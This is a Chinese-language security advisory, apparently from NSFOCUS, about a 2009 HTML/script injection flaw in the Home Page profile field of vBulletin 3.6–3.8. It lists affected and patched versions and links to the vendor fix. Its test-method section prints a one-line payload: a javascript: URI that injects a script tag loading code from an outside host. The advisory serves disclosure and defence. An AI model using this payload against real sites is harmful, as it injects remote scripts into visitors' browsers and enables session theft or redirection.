首页 -> 安全研究

安全研究

安全漏洞
vBulletin Home Page字段HTML注入漏洞

发布日期:2009-10-08
更新日期:2009-10-10

受影响系统:
VBulletin VBulletin 3.8
VBulletin VBulletin 3.7
VBulletin VBulletin 3.6
不受影响系统:
VBulletin VBulletin 3.8.4 PL1
VBulletin VBulletin 3.7.6 PL1
VBulletin VBulletin 3.6.12 PL2
描述:
BUGTRAQ  ID: 36643

vBulletin是一款开放源代码的PHP论坛程序。

vBulletin没有正确地过滤对用户配置文件部分的Home Page字段所传送的输入,远程攻击者可以通过向论坛提交恶意内容注入任意HTML和脚本代码,并在查看用户提交内容时执行。

<*来源:MaXe
  
  链接:http://secunia.com/advisories/36970/
        http://forum.intern0t.net/exploits-vulnerabilities-pocs/1502-vbulletin-3-8-4-cross-site-script-redirection.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

javascript://%0adocument.write('<script src=http://intern0t.net/.k></script>')

建议:
厂商补丁:

VBulletin
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.vbulletin.com/forum/showthread.php?t=319572

浏览次数:2425
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障